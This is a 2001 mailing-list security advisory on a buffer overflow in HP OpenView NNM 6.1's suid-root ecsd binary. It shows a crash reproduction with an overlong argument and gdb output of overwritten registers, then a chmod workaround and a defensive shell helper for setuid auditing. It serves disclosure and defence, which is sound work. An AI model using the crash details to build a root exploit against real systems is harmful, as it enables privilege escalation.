Date: Wed, 23 May 2001 18:00:57 +0200 (CEST)
From: Jonas Eriksson <[email protected]>
To: [email protected]
Subject: HP OpenView NNM v6.1 buffer overflow
HP OpenView NNM v6.1 buffer overflow
The problem..
HP OpenView NNM v6.1 has a buffer overflow in the suid-root file ecsd
located in the /opt/OV/bin/ directory.
ecsd is not used in NNM, but is shipped and installed suid-root as default.
Details..
je@openview~> uname -a
SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
je@openview~> ls -la /opt/OV/bin/ecsd
-r-sr-xr-x 1 root bin 2953640 maj 18 11:20 /opt/OV/bin/ecsd
je@openview~> pwd
/
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
Failed to restore engine
configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
Segmentation fault (core dumped)
je@openview~> gdb /opt/OV/bin/ecsd --core=core
[snip..]
Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
[snip..]
#0 0x28eb8 in main ()
(gdb) inf reg
[snip..]
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x41414141 1094795585
i5 0x41414141 1094795585
fp 0x41410028 1094778920
[snip..]
(gdb)
Vendor Status..
Hewlett-Packard has been contacted. They are currently working on patches
for this vulnerability.
Workaround..
chmod -s /opt/OV/bin/ecsd
This removes the setuid bit from /opt/OV/bin/ecsd, so that if someone
does exploit this vulnerability, they won't gain higher privileges.
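An audit helper for the workaround above, added here as an example and not part of the advisory: it lists the setuid/setgid binaries shipped in /opt/OV/bin, applies the same chmod -s to ecsd and verifies the bit is actually gone. Taking the directory as an argument (default /opt/OV/bin) is an assumption made so the helper can be exercised against a scratch directory.

```shell
#!/bin/sh
# ecsd setuid audit (added example, not from the advisory).
# The directory argument defaults to /opt/OV/bin; passing another
# directory is an assumption made for testing.

# Print every setuid or setgid regular file in a directory, one per line.
list_suid_bins() {
    find "$1" -maxdepth 1 -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Return 0 if the file currently carries the setuid bit, 1 otherwise.
has_setuid() {
    [ -u "$1" ]
}

# Apply the advisory's workaround (chmod -s) and confirm neither
# setuid nor setgid remains on the file.
strip_setuid() {
    chmod -s "$1" && ! [ -u "$1" ] && ! [ -g "$1" ]
}

# Check ecsd under the given directory, remove the bit if present,
# and report the resulting mode. Returns 2 if ecsd is not installed.
ecsd_workaround() {
    bin="${1:-/opt/OV/bin}/ecsd"
    if [ ! -f "$bin" ]; then
        echo "ecsd not present at $bin"
        return 2
    fi
    if has_setuid "$bin"; then
        echo "ecsd is setuid; removing the bit"
        strip_setuid "$bin" || return 1
    fi
    echo "ecsd mode is now $(ls -l "$bin" | cut -c1-10)"
    return 0
}
```

Running list_suid_bins on the real directory first shows which other shipped binaries are suid-root and worth the same review.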
Regards
Jonas Eriksson